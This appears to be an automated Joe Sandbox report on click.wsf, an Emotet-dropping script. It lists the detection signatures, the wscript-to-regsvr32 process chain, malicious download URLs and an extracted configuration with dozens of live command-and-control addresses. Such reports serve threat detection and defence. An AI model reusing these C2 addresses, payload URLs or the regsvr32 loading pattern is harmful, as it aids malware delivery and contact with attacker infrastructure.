Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
click.wsf

Overview

General Information

Sample Name:click.wsf
Analysis ID:830321
MD5:016fa961b9af49d75b597c2f61ab344c
SHA1:2fee0634cfa2988ee8f000724efc1c6c18beef23
SHA256:8343af0017ad64499072d1485302948a7ad744a638bd2deab301ae108b6b18fd
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 804 cmdline: "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail MD5: CA3FDE8329DE07C95897DB0D828545CD)
  • wscript.exe (PID: 6404 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf" MD5: 563EDAE37876138FDFF47F3E7A9A78FD)
    • regsvr32.exe (PID: 6508 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll MD5: 578BAB56836A3FE455FFC7883041825B)
      • regsvr32.exe (PID: 6544 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll" MD5: 578BAB56836A3FE455FFC7883041825B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
EmotetWhile Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet

Malware Configuration

Threatname: Emotet

{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5MHq6bwAsAIA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2snoEbwASAJI="]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.1414548751.000002D845C7D000.00000004.00000020.00020000.00000000.sdmpwebshell_asp_obfuscatedASP webshell obfuscatedArnim Rupp
  • 0x80c:$tagasp_long20: <script language="VB
  • 0x79f:$asp_payload9: execute "
  • 0xb2:$m_multi_one4: mid(
  • 0x2fb:$m_multi_one4: mid(
  • 0x4c8:$m_multi_one4: mid(
  • 0x6d1:$m_multi_one4: mid(
  • 0xa4c:$m_multi_one4: mid(
00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmpWEBSHELL_asp_genericGeneric ASP webshell which uses any eval/exec function indirectly on user input or writes a fileArnim Rupp
  • 0x312:$asp_gen_obf1: "+"
  • 0x342:$asp_gen_obf1: "+"
  • 0x1bd6:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
  • 0x7a6:$jsp4: public
  • 0xde6:$jsp4: public
  • 0x126:$asp_input1: request
  • 0x954:$asp_input1: request
  • 0x996:$asp_input1: request
  • 0xaac:$asp_input1: request
  • 0x1e96:$asp_input1: request
  • 0x460:$asp_payload11: wscript.shell
  • 0x48:$asp_multi_payload_one1: createobject
  • 0x136:$asp_multi_payload_one1: createobject
  • 0x1ae:$asp_multi_payload_one1: createobject
  • 0x208:$asp_multi_payload_one1: createobject
  • 0x444:$asp_multi_payload_one1: createobject
  • 0xbaa:$asp_multi_payload_one1: createobject
  • 0xee2:$asp_multi_payload_one1: createobject
  • 0x1db8:$asp_multi_payload_one1: createobject
  • 0x1ea6:$asp_multi_payload_one1: createobject
  • 0x1f1e:$asp_multi_payload_one1: createobject
00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmpwebshell_asp_obfuscatedASP webshell obfuscatedArnim Rupp
  • 0xdea6:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
  • 0x1726:$jsp4: public
  • 0x1d66:$jsp4: public
  • 0x9726:$jsp4: public
  • 0x9d66:$jsp4: public
  • 0xb736:$jsp4: public
  • 0xbd76:$jsp4: public
  • 0xc786:$jsp4: public
  • 0xcdc6:$jsp4: public
  • 0x13e0:$asp_payload11: wscript.shell
  • 0x93e0:$asp_payload11: wscript.shell
  • 0xb3f0:$asp_payload11: wscript.shell
  • 0xc440:$asp_payload11: wscript.shell
  • 0xfc8:$asp_multi_payload_one1: createobject
  • 0x10b6:$asp_multi_payload_one1: createobject
  • 0x112e:$asp_multi_payload_one1: createobject
  • 0x1188:$asp_multi_payload_one1: createobject
  • 0x13c4:$asp_multi_payload_one1: createobject
  • 0x1b2a:$asp_multi_payload_one1: createobject
  • 0x1e62:$asp_multi_payload_one1: createobject
  • 0x8fc8:$asp_multi_payload_one1: createobject
00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmpWEBSHELL_asp_genericGeneric ASP webshell which uses any eval/exec function indirectly on user input or writes a fileArnim Rupp
  • 0x1292:$asp_gen_obf1: "+"
  • 0x12c2:$asp_gen_obf1: "+"
  • 0x9292:$asp_gen_obf1: "+"
  • 0x92c2:$asp_gen_obf1: "+"
  • 0xb2a2:$asp_gen_obf1: "+"
  • 0xb2d2:$asp_gen_obf1: "+"
  • 0xc2f2:$asp_gen_obf1: "+"
  • 0xc322:$asp_gen_obf1: "+"
  • 0xdea6:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
  • 0x1726:$jsp4: public
  • 0x1d66:$jsp4: public
  • 0x9726:$jsp4: public
  • 0x9d66:$jsp4: public
  • 0xb736:$jsp4: public
  • 0xbd76:$jsp4: public
  • 0xc786:$jsp4: public
  • 0xcdc6:$jsp4: public
  • 0x10a6:$asp_input1: request
  • 0x18d4:$asp_input1: request
  • 0x1916:$asp_input1: request
  • 0x1a2c:$asp_input1: request
00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    Click to see the 11 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    3.2.regsvr32.exe.460000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      3.2.regsvr32.exe.460000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security

        Sigma Signatures

        Malware Analysis System Evasion

        barindex
        Sigma detected: Run temp file via regsvr32
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6404, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll, ProcessId: 6508, ProcessName: regsvr32.exe

        Snort Signatures

        Timestamp:192.168.2.3187.63.160.8849735802404314 03/20/23-09:07:57.133517
        SID:2404314
        Source Port:49735
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3182.162.143.56497344432404312 03/20/23-09:07:41.132019
        SID:2404312
        Source Port:49734
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3104.168.155.1434973880802404302 03/20/23-09:08:15.086032
        SID:2404302
        Source Port:49738
        Destination Port:8080
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.391.121.146.474973180802404344 03/20/23-09:07:19.650620
        SID:2404344
        Source Port:49731
        Destination Port:8080
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3164.90.222.65497374432404308 03/20/23-09:08:10.886539
        SID:2404308
        Source Port:49737
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3167.172.199.1654973680802404310 03/20/23-09:08:05.635641
        SID:2404310
        Source Port:49736
        Destination Port:8080
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.366.228.32.314973370802404330 03/20/23-09:07:25.133944
        SID:2404330
        Source Port:49733
        Destination Port:7080
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://softwareulike.com/cWIYxWMPkK/Avira URL Cloud: Label: malware
        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0Avira URL Cloud: Label: malware
        Source: https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnXAvira URL Cloud: Label: malware
        Source: https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/Avira URL Cloud: Label: malware
        Source: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/XAvira URL Cloud: Label: malware
        Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/Avira URL Cloud: Label: malware
        Source: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bKAvira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/YAvira URL Cloud: Label: malware
        Source: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/zAvira URL Cloud: Label: malware
        Source: https://163.44.196.120:8080/Avira URL Cloud: Label: malware
        Source: https://91.121.146.47:8080/Avira URL Cloud: Label: malware
        Source: https://www.gomespontes.com.br/logs/pd/vMAvira URL Cloud: Label: malware
        Source: https://167.172.199.165:8080/lAvira URL Cloud: Label: malware
        Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006Avira URL Cloud: Label: malware
        Source: https://167.172.199.165:8080/Avira URL Cloud: Label: malware
        Source: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgzAvira URL Cloud: Label: malware
        Source: https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/Avira URL Cloud: Label: malware
        Source: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/Avira URL Cloud: Label: malware
        Source: http://ozmeydan.com/cekici/9/Avira URL Cloud: Label: malware
        Source: https://164.90.222.65/)Avira URL Cloud: Label: malware
        Source: https://www.gomespontes.com.br/logs/pd/Avira URL Cloud: Label: malware
        Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wMAvira URL Cloud: Label: malware
        Source: https://penshorn.org/admin/Ses8712iGR8du/tMAvira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/4Avira URL Cloud: Label: malware
        Source: https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/Avira URL Cloud: Label: malware
        Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uMAvira URL Cloud: Label: malware
        Source: https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/Avira URL Cloud: Label: malware
        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/Avira URL Cloud: Label: malware
        Source: https://penshorn.org/admin/Ses8712iGR8du/Avira URL Cloud: Label: malware
        Source: http://softwareulike.com/cWIYxWMPkK/yMAvira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/Avira URL Cloud: Label: malware
        Source: https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLLAvira URL Cloud: Label: malware
        Source: http://ozmeydan.com/cekici/9/xMAvira URL Cloud: Label: malware
        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dllAvira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/PAvira URL Cloud: Label: malware
        Source: https://www.gomespontes.com.br/logs/pd/lAvira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/Avira URL Cloud: Label: malware
        Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/Avira URL Cloud: Label: malware
        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zMAvira URL Cloud: Label: malware
        Source: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/Avira URL Cloud: Label: malware
        Source: https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll(Avira URL Cloud: Label: malware
        Source: https://www.gomespontes.com.br/logs/pd/0wAvira URL Cloud: Label: malware
        Source: http://softwareulike.com/cWIYxWMPkK/_Avira URL Cloud: Label: malware
        Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476Avira URL Cloud: Label: malware
        Multi AV Scanner detection for domain / URL
        Source: bbvoyage.comVirustotal: Detection: 8%Perma Link
        Source: penshorn.orgVirustotal: Detection: 14%Perma Link
        Source: www.gomespontes.com.brVirustotal: Detection: 5%Perma Link
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\Desktop\rad75349.tmp.dllReversingLabs: Detection: 79%
        Source: C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy)ReversingLabs: Detection: 79%
        Source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5MHq6bwAsAIA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2snoEbwASAJI="]}
        Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.3:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 31.31.196.172:443 -> 192.168.2.3:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 186.202.153.5:443 -> 192.168.2.3:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 164.90.222.65:443 -> 192.168.2.3:49737 version: TLS 1.2
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D28 FindFirstFileExW,3_2_0000000180008D28

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443Jump to behavior
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 31.31.196.172 443Jump to behavior
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 186.202.153.5 443Jump to behavior
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 203.26.41.131 443Jump to behavior
        Source: C:\Windows\System32\wscript.exeDomain query: penshorn.org
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 160.16.142.56 8080Jump to behavior
        Source: C:\Windows\System32\wscript.exeDomain query: www.gomespontes.com.br
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443Jump to behavior
        Source: C:\Windows\System32\wscript.exeDomain query: bbvoyage.com
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080Jump to behavior
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.3:49731 -> 91.121.146.47:8080
        Source: TrafficSnort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.3:49733 -> 66.228.32.31:7080
        Source: TrafficSnort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.3:49734 -> 182.162.143.56:443
        Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.3:49735 -> 187.63.160.88:80
        Source: TrafficSnort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.3:49736 -> 167.172.199.165:8080
        Source: TrafficSnort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.3:49737 -> 164.90.222.65:443
        Source: TrafficSnort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.3:49738 -> 104.168.155.143:8080
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorIPs: 91.121.146.47:8080
        Source: Malware configuration extractorIPs: 66.228.32.31:7080
        Source: Malware configuration extractorIPs: 182.162.143.56:443
        Source: Malware configuration extractorIPs: 187.63.160.88:80
        Source: Malware configuration extractorIPs: 167.172.199.165:8080
        Source: Malware configuration extractorIPs: 164.90.222.65:443
        Source: Malware configuration extractorIPs: 104.168.155.143:8080
        Source: Malware configuration extractorIPs: 163.44.196.120:8080
        Source: Malware configuration extractorIPs: 160.16.142.56:8080
        Source: Malware configuration extractorIPs: 159.89.202.34:443
        Source: Malware configuration extractorIPs: 159.65.88.10:8080
        Source: Malware configuration extractorIPs: 186.194.240.217:443
        Source: Malware configuration extractorIPs: 149.56.131.28:8080
        Source: Malware configuration extractorIPs: 72.15.201.15:8080
        Source: Malware configuration extractorIPs: 1.234.2.232:8080
        Source: Malware configuration extractorIPs: 82.223.21.224:8080
        Source: Malware configuration extractorIPs: 206.189.28.199:8080
        Source: Malware configuration extractorIPs: 169.57.156.166:8080
        Source: Malware configuration extractorIPs: 107.170.39.149:8080
        Source: Malware configuration extractorIPs: 103.43.75.120:443
        Source: Malware configuration extractorIPs: 91.207.28.33:8080
        Source: Malware configuration extractorIPs: 213.239.212.5:443
        Source: Malware configuration extractorIPs: 45.235.8.30:8080
        Source: Malware configuration extractorIPs: 119.59.103.152:8080
        Source: Malware configuration extractorIPs: 164.68.99.3:8080
        Source: Malware configuration extractorIPs: 95.217.221.146:8080
        Source: Malware configuration extractorIPs: 153.126.146.25:7080
        Source: Malware configuration extractorIPs: 197.242.150.244:8080
        Source: Malware configuration extractorIPs: 202.129.205.3:8080
        Source: Malware configuration extractorIPs: 103.132.242.26:8080
        Source: Malware configuration extractorIPs: 139.59.126.41:443
        Source: Malware configuration extractorIPs: 110.232.117.186:8080
        Source: Malware configuration extractorIPs: 183.111.227.137:8080
        Source: Malware configuration extractorIPs: 5.135.159.50:443
        Source: Malware configuration extractorIPs: 201.94.166.162:443
        Source: Malware configuration extractorIPs: 103.75.201.2:443
        Source: Malware configuration extractorIPs: 79.137.35.198:8080
        Source: Malware configuration extractorIPs: 172.105.226.75:8080
        Source: Malware configuration extractorIPs: 94.23.45.86:4143
        Source: Malware configuration extractorIPs: 115.68.227.76:8080
        Source: Malware configuration extractorIPs: 153.92.5.27:8080
        Source: Malware configuration extractorIPs: 167.172.253.162:8080
        Source: Malware configuration extractorIPs: 188.44.20.25:443
        Source: Malware configuration extractorIPs: 147.139.166.154:8080
        Source: Malware configuration extractorIPs: 129.232.188.93:443
        Source: Malware configuration extractorIPs: 173.212.193.249:8080
        Source: Malware configuration extractorIPs: 185.4.135.165:8080
        Source: Malware configuration extractorIPs: 45.176.232.124:443
        Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
        Source: global trafficHTTP traffic detected: POST /wfqhlvcfruxkwghn/ivirkxueekmcz/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 164.90.222.65
        Source: Joe Sandbox ViewIP Address: 52.109.13.63 52.109.13.63
        Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
        Source: global trafficHTTP traffic detected: GET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbvoyage.com
        Source: global trafficHTTP traffic detected: GET /logs/pd/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.gomespontes.com.br
        Source: global trafficTCP traffic: 192.168.2.3:49731 -> 91.121.146.47:8080
        Source: global trafficTCP traffic: 192.168.2.3:49733 -> 66.228.32.31:7080
        Source: global trafficTCP traffic: 192.168.2.3:49736 -> 167.172.199.165:8080
        Source: global trafficTCP traffic: 192.168.2.3:49738 -> 104.168.155.143:8080
        Source: global trafficTCP traffic: 192.168.2.3:49739 -> 163.44.196.120:8080
        Source: global trafficTCP traffic: 192.168.2.3:49740 -> 160.16.142.56:8080
        Source: unknownNetwork traffic detected: IP country count 18
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:06:38 GMTServer: ApacheX-Powered-By: PHP/7.0.33Content-Length: 0Connection: closeContent-Type: text/html;charset=utf-8
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
        Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
        Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
        Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
        Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 52.109.13.63
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknownTCP traffic detected without corresponding DNS query: 52.109.76.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknownTCP traffic detected without corresponding DNS query: 52.109.76.141
        Source: unknownTCP traffic detected without corresponding DNS query: 52.109.13.63
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
